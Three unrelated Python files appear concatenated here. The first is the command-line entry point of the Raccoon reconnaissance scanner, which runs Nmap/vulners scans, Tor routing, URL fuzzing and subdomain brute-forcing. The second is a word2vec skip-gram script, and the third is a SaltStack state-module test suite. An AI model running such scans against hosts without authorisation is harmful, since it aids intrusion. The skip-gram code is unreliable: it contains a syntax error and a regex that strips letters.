" A proxy from the list will be chosen at random for each request."
" Slows total runtime")
@click.option("-c", "--cookies", help="Comma separated cookies to add to the requests. "
"Should be in the form of key:value\n"
"Example: PHPSESSID:12345,isMobile:false")
@click.option("--proxy", help="Proxy address to route HTTP traffic through. Slows total runtime")
@click.option("-w", "--wordlist", default=os.path.join(MY_PATH, "wordlists/fuzzlist"),
help="Path to wordlist that would be used for URL fuzzing")
@click.option("-T", "--threads", default=25,
help="Number of threads to use for URL Fuzzing/Subdomain enumeration. Default: 25")
@click.option("--ignored-response-codes", default="302,400,401,402,403,404,503,504",
help="Comma separated list of HTTP status code to ignore for fuzzing."
" Defaults to: 302,400,401,402,403,404,503,504")
@click.option("--subdomain-list", default=os.path.join(MY_PATH, "wordlists/subdomains"),
help="Path to subdomain list file that would be used for enumeration")
@click.option("-sc", "--scripts", is_flag=True, help="Run Nmap scan with -sC flag")
@click.option("-sv", "--services", is_flag=True, help="Run Nmap scan with -sV flag")
@click.option("-f", "--full-scan", is_flag=True, help="Run Nmap scan with both -sV and -sC")
@click.option("-p", "--port", help="Use this port range for Nmap scan instead of the default")
@click.option("--vulners-nmap-scan", is_flag=True, help="Perform an NmapVulners scan. "
"Runs instead of the regular Nmap scan and is longer.")
@click.option("--vulners-path", default=os.path.join(MY_PATH, "utils/misc/vulners.nse"),
help="Path to the custom nmap_vulners.nse script."
"If not used, Raccoon uses the built-in script it ships with.")
@click.option("-fr", "--follow-redirects", is_flag=True, default=False,
help="Follow redirects when fuzzing. Default: False (will not follow redirects)")
@click.option("--tls-port", default=443, help="Use this port for TLS queries. Default: 443")
@click.option("--skip-health-check", is_flag=True, help="Do not test for target host availability")
@click.option("--no-url-fuzzing", is_flag=True, help="Do not fuzz URLs")
@click.option("--no-sub-enum", is_flag=True, help="Do not bruteforce subdomains")
@click.option("--skip-nmap-scan", is_flag=True, help="Do not perform an Nmap scan")
# @click.option("-d", "--delay", default="0.25-1",
# help="Min and Max number of seconds of delay to be waited between requests\n"
# "Defaults to Min: 0.25, Max: 1. Specified in the format of Min-Max")
@click.option("-q", "--quiet", is_flag=True, help="Do not output to stdout")
@click.option("-o", "--outdir", default="Raccoon_scan_results",
help="Directory destination for scan output")
def main(target,
tor_routing,
proxy_list,
proxy,
cookies,
dns_records,
wordlist,
threads,
ignored_response_codes,
subdomain_list,
full_scan,
scripts,
services,
port,
vulners_nmap_scan,
vulners_path,
tls_port,
skip_health_check,
follow_redirects,
no_url_fuzzing,
no_sub_enum,
skip_nmap_scan,
# delay,
outdir,
quiet):
try:
# ------ Arg validation ------
# Set logging level and Logger instance
log_level = HelpUtilities.determine_verbosity(quiet)
logger = SystemOutLogger(log_level)
intro(logger)
target = target.lower()
try:
HelpUtilities.validate_executables()
except RaccoonException as e:
logger.critical(str(e))
exit(9)
HelpUtilities.validate_wordlist_args(proxy_list, wordlist, subdomain_list)
HelpUtilities.validate_proxy_args(tor_routing, proxy, proxy_list)
HelpUtilities.create_output_directory(outdir)
if tor_routing:
logger.info("{} Testing that Tor service is up...".format(COLORED_COMBOS.NOTIFY))
elif proxy_list:
if proxy_list and not os.path.isfile(proxy_list):
raise FileNotFoundError("Not a valid file path, {}".format(proxy_list))
else:
logger.info("{} Routing traffic using proxies from list {}\n".format(
COLORED_COMBOS.NOTIFY, proxy_list))
elif proxy:
logger.info("{} Routing traffic through proxy {}\n".format(COLORED_COMBOS.NOTIFY, proxy))
# TODO: Sanitize delay argument
dns_records = tuple(dns_records.split(","))
ignored_response_codes = tuple(int(code) for code in ignored_response_codes.split(","))
if port:
HelpUtilities.validate_port_range(port)
# ------ /Arg validation ------
if cookies:
try:
cookies = HelpUtilities.parse_cookie_arg(cookies)
except RaccoonException as e:
logger.critical("{}{}{}".format(COLOR.RED, str(e), COLOR.RESET))
exit(2)
# Set Request Handler instance
request_handler = RequestHandler(
proxy_list=proxy_list,
tor_routing=tor_routing,
single_proxy=proxy,
cookies=cookies
)
if tor_routing:
try:
HelpUtilities.confirm_traffic_routs_through_tor()
logger.info("{} Validated Tor service is up. Routing traffic anonymously\n".format(
COLORED_COMBOS.NOTIFY))
except RaccoonException as err:
print("{}{}{}".format(COLOR.RED, str(err), COLOR.RESET))
exit(3)
main_loop = asyncio.get_event_loop()
logger.info("{}### Raccoon Scan Started ###{}\n".format(COLOR.GRAY, COLOR.RESET))
logger.info("{} Trying to gather information about host: {}".format(COLORED_COMBOS.INFO, target))
# TODO: Populate array when multiple targets are supported
# hosts = []
try:
host = Host(target=target, dns_records=dns_records)
host.parse()
except HostHandlerException as e:
logger.critical("{}{}{}".format(COLOR.RED, str(e), COLOR.RESET))
exit(11)
if not skip_health_check:
try:
HelpUtilities.validate_target_is_up(host)
except RaccoonException as err:
logger.critical("{}{}{}".format(COLOR.RED, str(err), COLOR.RESET))
exit(42)
if not skip_nmap_scan:
if vulners_nmap_scan:
logger.info("\n{} Setting NmapVulners scan to run in the background".format(COLORED_COMBOS.INFO))
nmap_vulners_scan = NmapVulnersScan(host=host, port_range=port, vulners_path=vulners_path)
nmap_thread = threading.Thread(target=VulnersScanner.run, args=(nmap_vulners_scan,))
# Run NmapVulners scan in the background
nmap_thread.start()
else:
logger.info("\n{} Setting Nmap scan to run in the background".format(COLORED_COMBOS.INFO))
nmap_scan = NmapScan(
host=host,
port_range=port,
full_scan=full_scan,
scripts=scripts,
services=services)
nmap_thread = threading.Thread(target=Scanner.run, args=(nmap_scan,))
# Run Nmap scan in the background. Can take some time
nmap_thread.start()
# Run first set of checks - TLS, Web/WAF Data, DNS data
waf = WAF(host)
tls_info_scanner = TLSHandler(host, tls_port)
web_app_scanner = WebApplicationScanner(host)
tasks = (
asyncio.ensure_future(tls_info_scanner.run()),
asyncio.ensure_future(waf.detect()),
asyncio.ensure_future(DNSHandler.grab_whois(host)),
asyncio.ensure_future(web_app_scanner.run_scan()),
asyncio.ensure_future(DNSHandler.generate_dns_dumpster_mapping(host, logger))
)
main_loop.run_until_complete(asyncio.wait(tasks))
# Second set of checks - URL fuzzing, Subdomain enumeration
if not no_url_fuzzing:
fuzzer = URLFuzzer(host, ignored_response_codes, threads, wordlist, follow_redirects)
main_loop.run_until_complete(fuzzer.fuzz_all())
if not host.is_ip:
sans = tls_info_scanner.sni_data.get("SANs")
subdomain_enumerator = SubDomainEnumerator(
host,
domain_list=subdomain_list,
sans=sans,
ignored_response_codes=ignored_response_codes,
num_threads=threads,
follow_redirects=follow_redirects,
no_sub_enum=no_sub_enum
)
main_loop.run_until_complete(subdomain_enumerator.run())
if not skip_nmap_scan:
if nmap_thread.is_alive():
logger.info("{} All scans done. Waiting for Nmap scan to wrap up. "
"Time left may vary depending on scan type and port range".format(COLORED_COMBOS.INFO))
while nmap_thread.is_alive():
time.sleep(15)
logger.info("\n{}### Raccoon scan finished ###{}\n".format(COLOR.GRAY, COLOR.RESET))
os.system("stty sane")
except KeyboardInterrupt:
print("{}Keyboard Interrupt detected. Exiting{}".format(COLOR.RED, COLOR.RESET))
# Fix F'd up terminal after CTRL+C
os.system("stty sane")
exit(42)
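# Illustrative sketch, not part of Raccoon itself: the orchestration in main()
# above schedules several independent coroutines with asyncio.ensure_future and
# then blocks on asyncio.wait until all of them complete. The probe names below
# are made up for the example, and the helper is defined but never called.
def _concurrency_pattern_example():
    async def probe_one():
        await asyncio.sleep(0.1)  # stand-in for a network check

    async def probe_two():
        await asyncio.sleep(0.2)  # stand-in for another network check

    loop = asyncio.get_event_loop()
    tasks = (
        asyncio.ensure_future(probe_one()),
        asyncio.ensure_future(probe_two()),
    )
    # run_until_complete returns once every scheduled task has finished,
    # mirroring the "first set of checks" block in main().
    loop.run_until_complete(asyncio.wait(tasks))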
if __name__ == "__main__":
main()
|
skipgramtext8.py
|
from __future__ import absolute_import, division, print_function
import numpy as np
import multiprocessing
from multiprocessing import Pool, Array, Process, Value, Manager
import random
import os
import re
import unicodedata
import time
from io import open
num_threads = multiprocessing.cpu_count()
start = time.process_time()
starting_lr = 1e-3
sample = 1e-3
word_count_actual = 0
lr = 0.025
print(num_threads)
MAX_STRING = 100
MAX_SENTENCE_LENGTH = 1000
MAX_CODE_LENGTH = 40
# Turn a Unicode string to plain ASCII
def unicodeToAscii(s):
return ''.join(
c for c in unicodedata.normalize('NFD', s)
if unicodedata.category(c) != 'Mn'
)
# Lowercase, trim, and remove non-letter characters
def normalizeString(s):
s = unicodeToAscii(s.lower().strip())
s = re.sub(r"([.!?])", r" \1",, s)
s = re.sub(r"[a-zA-Z.!?]+", r" ", s)
s = re.sub(r"\s+", r" ", s).strip()
return s
class Voc:
def __init__(self):
self.trimmed = False
self.word2index = {}
self.word2count = {}
self.index2word = {}
self.index2count = {}
# For Huffman encoding
self.index2code = {}
self.index2point = {}
self.index2codelen = {}
self.num_words = 0
        self.total_words = 0
def _init_dict(self, input_file, min_count):
sentences = []
        for line in input_file:
sentence = []
line = line.strip().split(' ')
for word in line:
word = normalizeString(word)
self.addWord(word)
                sentence.append(word)
sentences.append(sentence)
self.trim(min_count)
for k, c in self.word2count.items():
self.total_words += c
return sentences
def addSentence(self, sentence):
for word in sentence.split(' '):
self.addWord(word)
def addWord(self, word):
if word not in self.word2index:
self.word2index[word] = self.num_words
self.word2count[word] = 1
self.index2word[self.num_words] = word
self.index2count[self.num_words] = 1
self.num_words += 1
else:
self.word2count[word] += 1
self.index2count[self.word2index[word]] += 1
# Remove words below a certain count threshold
def trim(self, min_count):
if self.trimmed:
return
self.trimmed = True
keep_words = []
for k, v in self.word2count.items():
if v >= min_count:
for _ in range(v):
keep_words.append(k)
print('keep_words {} / {} = {:.4f}'.format(
len(keep_words), len(self.word2index), len(keep_words) / len(self.word2index)
))
# Reinitialize dictionaries
self.word2index = {}
self.word2count = {}
self.index2word = {}
self.index2count = {}
self.num_words = 0
for word in keep_words:
self.addWord(word)
class HuffmanTree:
def __init__(self, vocab):
self.vocab = vocab
self.vocab_size = len(self.vocab.index2count)
self.count = np.ones(self.vocab_size * 2 + 1) * 1e15
for word_id, frequency in self.vocab.index2count.items():
self.count[word_id] = frequency
self.binary = np.zeros(self.vocab_size * 2 + 1)
self.parent = np.zeros(self.vocab_size * 2 + 1)
def build_tree(self):
min1_idx = min2_idx = int()
pos1 = self.vocab_size - 1
pos2 = self.vocab_size
        # The following algorithm constructs the Huffman tree by adding one node at a time
for i in range(self.vocab_size):
# First, find two smallest nodes 'min1, min2'
if pos1 >= 0:
if self.count[pos1] < self.count[pos2]:
min1_idx = pos1
pos1 -= 1
else:
min1_idx = pos2
pos2 += 1
else:
min1_idx = pos2
pos2 += 1
if pos1 >= 0:
if self.count[pos1] < self.count[pos2]:
min2_idx = pos1
pos1 -= 1
else:
min2_idx = pos2
pos2 += 1
else:
min2_idx = pos2
                pos2 += 1
self.count[self.vocab_size + i] = self.count[min1_idx] + self.count[min2_idx]
self.parent[min1_idx] = self.vocab_size + i
self.parent[min2_idx] = self.vocab_size + i
self.binary[min2_idx] = 1
# Now assign binary code to each vocabulary word
for w_id in range(self.vocab_size):
path_id = w_id
code = np.array(list())
point = np.array(list())
while 1:
                code = np.insert(code, 0, self.binary[path_id])
                point = np.insert(point, 0, path_id)
                path_id = int(self.parent[path_id])
if path_id == (self.vocab_size * 2 - 2):
break
point = point - self.vocab_size
            point = np.insert(point, 0, self.vocab_size - 2)
self.vocab.index2codelen[w_id] = len(code)
self.vocab.index2point[w_id] = point
self.vocab.index2code[w_id] = code
del code
del point
del self.count
del self.binary
del self.parent
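# Illustrative sketch (not part of the original script): for a toy vocabulary
# with frequencies the=5, cat=2, sat=1 (word ids 0, 1, 2), the loop above first
# merges the two rarest words ('cat', 'sat') into an internal node of count 3,
# then merges that node with 'the' into the root. Frequent words therefore get
# short codes, e.g. roughly the -> [1], cat -> [0, 1], sat -> [0, 0], where each
# bit is one branching decision on the path down from the root. index2code
# stores these bit paths and index2point the internal-node ids visited along
# them; both are consumed by the hierarchical-softmax loop in
# SkipGram.TrainModelThread below.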
MIN_COUNT = 3
MAX_EXP = 6
EPOCH = 5
WINDOW = 5
debug_mode = True
def sigmoid(x, derivative=False):
sigm = 1. / (1. + np.exp(-x))
if derivative:
return sigm * (1. - sigm)
return sigm
# Make a Skip-gram model
class SkipGram:
def __init__(self, vocab, emb_dim):
self.sentences = []
self.vocab = vocab
self.embed_dim = emb_dim
low = -0.5 / emb_dim
high = 0.5 / emb_dim
self.W = np.random.uniform(low, high, (self.vocab.num_words, emb_dim))
self.W_prime = np.zeros((self.vocab.num_words, emb_dim))
def LoadData(self, tid):
sentence_count = len(self.sentences)
start = sentence_count // num_threads * tid
end = min(sentence_count // num_threads * (tid + 1), sentence_count)
return self.sentences[start:end]
def Save_Embedding(self, file_name):
embedding = self.W
fout = open(file_name, 'w')
fout.write('%d %d\n' %(len(self.vocab.index2word), self.embed_dim))
for w_id, w in self.vocab.index2word.items():
e = embedding[w_id]
e = ' '.join(map(lambda x: str(x), e))
fout.write('%s %s\n' % (w, e))
def TrainModelThread(self, tid, lr, word_count_actual, W, W_prime):
word_count = last_word_count = sentence_position = sentence_length = 0
local_epochs = EPOCH
sentences = self.LoadData(tid.value)
neu1 = np.zeros(self.embed_dim)
neu1e = np.zeros(self.embed_dim)
sen = []
        for epoch in range(local_epochs):
for sentence in sentences:
sentence_position = 0
sentence_length = 0
sen = []
while 1:
if word_count - last_word_count > 10000:
word_count_actual.value = word_count_actual.value + word_count - last_word_count
last_word_count = word_count
if debug_mode:
now = time.process_time()
print("Learning rate: {:f} Progress: {:.2f} Words/thread/sec: {:.2f}k ".format(lr,
word_count_actual.value / (EPOCH * self.vocab.total_words + 1) * 100,
word_count_actual.value / (now - start + 1) / 1e6 * 1000))
lr.value = starting_lr * (1 - word_count_actual.value / (EPOCH * self.vocab.total_words + 1))
if (lr.value < starting_lr * 0.0001):
lr.value = starting_lr * 0.0001
if sentence_length == 0:
for word in sentence:
word_count += 1
if sample > 0:
                                ran = ((np.sqrt(self.vocab.word2count[word] / (sample * self.vocab.total_words)) + 1)
                                       * (sample * self.vocab.total_words) / self.vocab.word2count[word])
if ran < np.random.uniform(0, 1, 1).item():
continue
                            sen.append(self.vocab.word2index[word])
sentence_length += 1
sentence_position = 0
word_idx = sen[sentence_position]
neu1 = np.zeros(self.embed_dim)
neu1e = np.zeros(self.embed_dim)
b = np.random.randint(WINDOW, size=1).item()
for a in range(b, WINDOW*2 + 1 - b, 1):
if a != WINDOW:
last_pos = sentence_position - WINDOW + a
if last_pos < 0: continue
if last_pos >= sentence_length: continue
last_word_idx = sen[last_pos]
l1 = last_word_idx
neu1e = np.zeros(self.embed_dim)
# Hierarchical Softmax
for d in range(self.vocab.index2codelen[word_idx]):
f = 0
                                l2 = int(self.vocab.index2point[word_idx][d])
# Propagate hidden -> output
f += np.dot(W[l1], W_prime[l2])
if f <= -MAX_EXP:
continue
                                elif f >= MAX_EXP:
continue
else:
f = sigmoid(f)
# 'g' is the gradient multiplied by the learning rate
gradient = (1 - self.vocab.index2code[word_idx][d] - f) * lr.value
# Propagate errors output -> hidden
neu1e += gradient * W_prime[l2]
# Learn weights hidden -> output
W_prime[l2] += gradient * W[l1]
# Learn weights input -> hidden
W[l1] += neu1e
sentence_position += 1
if sentence_position >= sentence_length:
break
word_count_actual.value = word_count_actual.value + word_count - last_word_count
word_count = 0
last_word_count = 0
sentence_length = 0
def TrainModel(self, input_file_name, output_file_name):
print("Starting training using file ", input_file_name)
        input_file = open(input_file_name, 'r', encoding='utf-8')
# Initializing dictionary
self.sentences = self.vocab._init_dict(input_file, MIN_COUNT)
huffman = HuffmanTree(self.vocab)
huffman.build_tree()
start = time.process_time()
jobs = []
t_id = Value('i', 0)
word_count_actual = Value('i', 0)
lr = Value('d', 0.025)
W = Array('d', self.W)
W_prime = Array('f', self.W_prime)
for i in range(num_threads):
p = Process(target=self.TrainModelThread, args=[t_id, lr, word_count_actual, W, W_prime])
jobs.append(p)
t_id.value = t_id.value + 1
for j in jobs:
j.start()
for j in jobs:
j.join()
        self.Save_Embedding(output_file_name)
input_file_name='/home/changmin/research/MMI/data/text8'
output_file_name='embedding.txt'
voc = Voc()
with open(input_file_name, 'r', encoding='utf-8') as f:
    voc._init_dict(f, 3)
print(voc.num_words)
print(voc.word2index)
#skip = SkipGram(voc, 100)
#skip.TrainModel(input_file_name, output_file_name)
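# Minimal sketch (not part of the original script) of the hierarchical-softmax
# update performed inside SkipGram.TrainModelThread, spelled out for a single
# (context word, center word) pair. It assumes `vocab` is a Voc whose code and
# point tables were filled by HuffmanTree.build_tree, and that W and W_prime
# are plain numpy matrices; the helper is defined here but never called.
def hs_update_single_pair(W, W_prime, vocab, context_idx, center_idx, lr_value):
    neu1e = np.zeros(W.shape[1])
    for d in range(vocab.index2codelen[center_idx]):
        node = int(vocab.index2point[center_idx][d])
        f = sigmoid(np.dot(W[context_idx], W_prime[node]))
        # The target label is (1 - code bit), as in the word2vec formulation.
        g = (1 - vocab.index2code[center_idx][d] - f) * lr_value
        neu1e += g * W_prime[node]           # accumulate error for the input vector
        W_prime[node] += g * W[context_idx]  # update the internal-node vector
    W[context_idx] += neu1e                  # finally update the input vector
    return W, W_prime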
|
test_state.py
|
# -*- coding: utf-8 -*-
# Import Python libs
from __future__ import absolute_import, print_function, unicode_literals
import logging
import os
import shutil
import sys
import tempfile
import textwrap
import threading
import time
# Import Salt Testing libs
from tests.support.case import ModuleCase
from tests.support.helpers import with_tempdir
from tests.support.unit import skipIf
from tests.support.paths import BASE_FILES, TMP, TMP_PILLAR_TREE
from tests.support.mixins import SaltReturnAssertsMixin
# Import Salt libs
import salt.utils.atomicfile
import salt.utils.files
import salt.utils.path
import salt.utils.platform
import salt.utils.stringutils
from salt.modules.virtualenv_mod import KNOWN_BINARY_NAMES
# Import 3rd-party libs
from salt.ext import six
log = logging.getLogger(__name__)
DEFAULT_ENDING = salt.utils.stringutils.to_bytes(os.linesep)
def trim_line_end(line):
'''
Remove CRLF or LF from the end of line.
'''
if line[-2:] == salt.utils.stringutils.to_bytes('\r\n'):
return line[:-2]
elif line[-1:] == salt.utils.stringutils.to_bytes('\n'):
return line[:-1]
raise Exception("Invalid line ending")
def reline(source, dest, force=False, ending=DEFAULT_ENDING):
'''
Normalize the line endings of a file.
'''
fp, tmp = tempfile.mkstemp()
os.close(fp)
with salt.utils.files.fopen(tmp, 'wb') as tmp_fd:
with salt.utils.files.fopen(source, 'rb') as fd:
lines = fd.readlines()
for line in lines:
line_noend = trim_line_end(line)
tmp_fd.write(line_noend + ending)
if os.path.exists(dest) and force:
os.remove(dest)
os.rename(tmp, dest)
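# Illustrative usage (not called in this module): normalize a fixture to CRLF
# endings in place, overwriting the destination if it already exists. The path
# below is only an example.
#
#   reline('/path/to/testappend/firstif', '/path/to/testappend/firstif',
#          force=True, ending=salt.utils.stringutils.to_bytes('\r\n'))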
class StateModuleTest(ModuleCase, SaltReturnAssertsMixin):
'''
Validate the state module
'''
maxDiff = None
@classmethod
def setUpClass(cls):
def _reline(path, ending=DEFAULT_ENDING):
'''
Normalize the line endings of a file.
'''
with salt.utils.files.fopen(path, 'rb') as fhr:
lines = fhr.read().splitlines()
with salt.utils.atomicfile.atomic_open(path, 'wb') as fhw:
for line in lines:
fhw.write(line + ending)
        destpath = os.path.join(BASE_FILES, 'testappend', 'firstif')
        _reline(destpath)
        destpath = os.path.join(BASE_FILES, 'testappend', 'secondif')
        _reline(destpath)
def test_show_highstate(self):
'''
state.show_highstate
'''
high = self.run_function('state.show_highstate')
destpath = os.path.join(TMP, 'testfile')
self.assertTrue(isinstance(high, dict))
self.assertTrue(destpath in high)
self.assertEqual(high[destpath]['__env__'], 'base')
def test_show_lowstate(self):
'''
state.show_lowstate
'''
low = self.run_function('state.show_lowstate')
self.assertTrue(isinstance(low, list))
self.assertTrue(isinstance(low[0], dict))
def test_catch_recurse(self):
'''
state.show_sls used to catch a recursive ref
'''
err = self.run_function('state.sls', mods='recurse_fail')
self.assertIn('recursive', err[0])
def test_no_recurse(self):
'''
verify that a sls structure is NOT a recursive ref
'''
sls = self.run_function('state.show_sls', mods='recurse_ok')
self.assertIn('snmpd', sls)
def test_no_recurse_two(self):
'''
verify that a sls structure is NOT a recursive ref
'''
sls = self.run_function('state.show_sls', mods='recurse_ok_two')
self.assertIn('/etc/nagios/nrpe.cfg', sls)
def test_running_dictionary_consistency(self):
'''
Test the structure of the running dictionary so we don't change it
without deprecating/documenting the change
'''
running_dict_fields = [
'__id__',
'__run_num__',
'__sls__',
'changes',
'comment',
'duration',
'name',
'result',
'start_time',
]
sls = self.run_function('state.single',
fun='test.succeed_with_changes',
name='gndn')
for state, ret in sls.items():
for field in running_dict_fields:
self.assertIn(field, ret)
def test_running_dictionary_key_sls(self):
'''
Ensure the __sls__ key is either null or a string
'''
sls1 = self.run_function('state.single',
fun='test.succeed_with_changes',
name='gndn')
sls2 = self.run_function('state.sls', mods='gndn')
for state, ret in sls1.items():
self.assertTrue(isinstance(ret['__sls__'], type(None)))
for state, ret in sls2.items():
self.assertTrue(isinstance(ret['__sls__'], six.string_types))
def _remove_request_cache_file(self):
'''
remove minion state request file
'''
cache_file = os.path.join(self.get_config('minion')['cachedir'], 'req_state.p')
if os.path.exists(cache_file):
os.remove(cache_file)
def test_request(self):
'''
verify sending a state request to the minion(s)
'''
self._remove_request_cache_file()
ret = self.run_function('state.request', mods='modules.state.requested')
result = ret['cmd_|-count_root_dir_contents_|-ls -a / | wc -l_|-run']['result']
self.assertEqual(result, None)
def test_check_request(self):
'''
verify checking a state request sent to the minion(s)
'''
self._remove_request_cache_file()
self.run_function('state.request', mods='modules.state.requested')
ret = self.run_function('state.check_request')
result = ret['default']['test_run']['cmd_|-count_root_dir_contents_|-ls -a / | wc -l_|-run']['result']
self.assertEqual(result, None)
def test_clear_request(self):
'''
verify clearing a state request sent to the minion(s)
'''
self._remove_request_cache_file()
self.run_function('state.request', mods='modules.state.requested')
ret = self.run_function('state.clear_request')
self.assertTrue(ret)
def test_run_request_succeeded(self):
'''
verify running a state request sent to the minion(s)
'''
self._remove_request_cache_file()
if salt.utils.platform.is_windows():
self.run_function('state.request', mods='modules.state.requested_win')
else:
self.run_function('state.request', mods='modules.state.requested')
ret = self.run_function('state.run_request')
if salt.utils.platform.is_windows():
key = 'cmd_|-count_root_dir_contents_|-Get-ChildItem C:\\\\ | Measure-Object | %{$_.Count}_|-run'
else:
key = 'cmd_|-count_root_dir_contents_|-ls -a / | wc -l_|-run'
result = ret[key]['result']
self.assertTrue(result)
def test_run_request_failed_no_request_staged(self):
'''
verify not running a state request sent to the minion(s)
'''
self._remove_request_cache_file()
self.run_function('state.request', mods='modules.state.requested')
self.run_function('state.clear_request')
ret = self.run_function('state.run_request')
self.assertEqual(ret, {})
@with_tempdir()
def test_issue_1896_file_append_source(self, base_dir):
'''
Verify that we can append a file's contents
'''
testfile = os.path.join(base_dir, 'test.append')
ret = self.run_state('file.touch', name=testfile)
self.assertSaltTrueReturn(ret)
ret = self.run_state(
'file.append',
name=testfile,
source='salt://testappend/firstif')
self.assertSaltTrueReturn(ret)
ret = self.run_state(
'file.append',
name=testfile,
source='salt://testappend/secondif')
self.assertSaltTrueReturn(ret)
with salt.utils.files.fopen(testfile, 'r') as fp_:
testfile_contents = salt.utils.stringutils.to_unicode(fp_.read())
contents = textwrap.dedent('''\
# set variable identifying the chroot you work in (used in the prompt below)
if [ -z "$debian_chroot" ] && [ -r /etc/debian_chroot ]; then
debian_chroot=$(cat /etc/debian_chroot)
fi
# enable bash completion in interactive shells
if [ -f /etc/bash_completion ] && ! shopt -oq posix; then
. /etc/bash_completion
fi
''')
if salt.utils.platform.is_windows():
new_contents = contents.splitlines()
contents = os.linesep.join(new_contents)
contents += os.linesep
self.assertMultiLineEqual(contents, testfile_contents)
ret = self.run_state(
'file.append',
name=testfile,
source='salt://testappend/secondif')
self.assertSaltTrueReturn(ret)
ret = self.run_state(
'file.append',
name=testfile,
source='salt://testappend/firstif')
self.assertSaltTrueReturn(ret)
with salt.utils.files.fopen(testfile, 'r') as fp_:
testfile_contents = salt.utils.stringutils.to_unicode(fp_.read())
self.assertMultiLineEqual(contents, testfile_contents)
def test_issue_1876_syntax_error(self):
'''
verify that we catch the following syntax error::
/tmp/salttest/issue-1876:
file:
- managed
- source: salt://testfile
file.append:
- text: foo
'''
testfile = os.path.join(TMP, 'issue-1876')
sls = self.run_function('state.sls', mods='issue-1876')
self.assertIn(
'ID \'{0}\' in SLS \'issue-1876\' contains multiple state '
'declarations of the same type'.format(testfile),
sls
)
def test_issue_1879_too_simple_contains_check(self):
expected = textwrap.dedent('''\
# set variable identifying the chroot you work in (used in the prompt below)
if [ -z "$debian_chroot" ] && [ -r /etc/debian_chroot ]; then
debian_chroot=$(cat /etc/debian_chroot)
fi
# enable bash completion in interactive shells
if [ -f /etc/bash_completion ] && ! shopt -oq posix; then
. /etc/bash_completion
fi
''')
if salt.utils.platform.is_windows():
new_contents = expected.splitlines()
expected = os.linesep.join(new_contents)
expected += os.linesep
testfile = os.path.join(TMP, 'issue-1879')
        # Delete the file if it already exists
if os.path.isfile(testfile):
os.unlink(testfile)
# Create the file
ret = self.run_function('state.sls', mods='issue-1879', timeout=120)
self.assertSaltTrueReturn(ret)
# The first append
ret = self.run_function(
'state.sls', mods='issue-1879.step-1', timeout=120
)
self.assertSaltTrueReturn(ret)
# The second append
ret = self.run_function(
'state.sls', mods='issue-1879.step-2', timeout=120
)
self.assertSaltTrueReturn(ret)
# Does it match?
try:
with salt.utils.files.fopen(testfile, 'r') as fp_:
contents = salt.utils.stringutils.to_unicode(fp_.read())
self.assertMultiLineEqual(expected, contents)
# Make sure we don't re-append existing text
ret = self.run_function(
'state.sls', mods='issue-1879.step-1', timeout=120
)
self.assertSaltTrueReturn(ret)
ret = self.run_function(
'state.sls', mods='issue-1879.step-2', timeout=120
)
self.assertSaltTrueReturn(ret)
with salt.utils.files.fopen(testfile, 'r') as fp_:
contents = salt.utils.stringutils.to_unicode(fp_.read())
self.assertMultiLineEqual(expected, contents)
except Exception:
if os.path.exists(testfile):
shutil.copy(testfile, testfile + '.bak')
raise
finally:
if os.path.exists(testfile):
os.unlink(testfile)
def test_include(self):
tempdir = tempfile.mkdtemp(dir=TMP)
self.addCleanup(shutil.rmtree, tempdir, ignore_errors=True)
pillar = {}
for path in ('include-test', 'to-include-test', 'exclude-test'):
pillar[path] = os.path.join(tempdir, path)
ret = self.run_function('state.sls', mods='include-test', pillar=pillar)
self.assertSaltTrueReturn(ret)
self.assertTrue(os.path.isfile(pillar['include-test']))
self.assertTrue(os.path.isfile(pillar['to-include-test']))
self.assertFalse(os.path.isfile(pillar['exclude-test']))
def test_exclude(self):
tempdir = tempfile.mkdtemp(dir=TMP)
self.addCleanup(shutil.rmtree, tempdir, ignore_errors=True)
pillar = {}
for path in ('include-test', 'exclude-test', 'to-include-test'):
pillar[path] = os.path.join(tempdir, path)
ret = self.run_function('state.sls', mods='exclude-test', pillar=pillar)
self.assertSaltTrueReturn(ret)
self.assertTrue(os.path.isfile(pillar['include-test']))
self.assertTrue(os.path.isfile(pillar['exclude-test']))
self.assertFalse(os.path.isfile(pillar['to-include-test']))
@skipIf(salt.utils.path.which_bin(KNOWN_BINARY_NAMES) is None, 'virtualenv not installed')
def test_issue_2068_template_str(self):
venv_dir = os.path.join(
TMP, 'issue-2068-template-str'
)
try:
ret = self.run_function(
'state.sls', mods='issue-2068-template-str-no-dot',
timeout=120
)
self.assertSaltTrueReturn(ret)
finally:
if os.path.isdir(venv_dir):
shutil.rmtree(venv_dir)
# Let's load the template from the filesystem. If running this state
# with state.sls works, so should using state.template_str
template_path = os.path.join(
os.path.dirname(os.path.dirname(__file__)),
'files', 'file', 'base', 'issue-2068-template-str-no-dot.sls'
)
with salt.utils.files.fopen(template_path, 'r') as fp_:
template = salt.utils.stringutils.to_unicode(fp_.read())
ret = self.run_function(
'state.template_str', [template], timeout=120
)
self.assertSaltTrueReturn(ret)
# Now using state.template
ret = self.run_function(
'state.template', [template_path], timeout=120
)
self.assertSaltTrueReturn(ret)
# Now the problematic #2068 including dot's
ret = self.run_function(
'state.sls', mods='issue-2068-template-str', timeout=120
)
self.assertSaltTrueReturn(ret)
# Let's load the template from the filesystem. If running this state
# with state.sls works, so should using state.template_str
template_path = os.path.join(
os.path.dirname(os.path.dirname(__file__)),
'files', 'file', 'base', 'issue-2068-template-str.sls'
)
with salt.utils.files.fopen(template_path, 'r') as fp_:
template = salt.utils.stringutils.to_unicode(fp_.read())
ret = self.run_function(
'state.template_str', [template], timeout=120
)
self.assertSaltTrueReturn(ret)
# Now using state.template
ret = self.run_function(
'state.template', [template_path], timeout=120
)
self.assertSaltTrueReturn(ret)
def test_template_invalid_items(self):
TEMPLATE = textwrap.dedent('''\
{0}:
- issue-2068-template-str
/tmp/test-template-invalid-items:
file:
- managed
- source: salt://testfile
''')
for item in ('include', 'exclude', 'extends'):
ret = self.run_function(
'state.template_str', [TEMPLATE.format(item)]
)
self.assertTrue(isinstance(ret, list))
self.assertNotEqual(ret, [])
self.assertEqual(
['The \'{0}\' declaration found on \'<template-str>\' is '
'invalid when rendering single templates'.format(item)],
ret
)
def test_pydsl(self):
'''
Test the basics of the pydsl
'''
ret = self.run_function('state.sls', mods='pydsl-1')
self.assertSaltTrueReturn(ret)
def test_issues_7905_and_8174_sls_syntax_error(self):
'''
Call sls file with yaml syntax error.
        Ensure these errors are detected and presented to the user without
stack traces.
'''
ret = self.run_function('state.sls', mods='syntax.badlist')
self.assertEqual(ret, [
'State \'A\' in SLS \'syntax.badlist\' is not formed as a list'
])
ret = self.run_function('state.sls', mods='syntax.badlist2')
self.assertEqual(ret, [
'State \'C\' in SLS \'syntax.badlist2\' is not formed as a list'
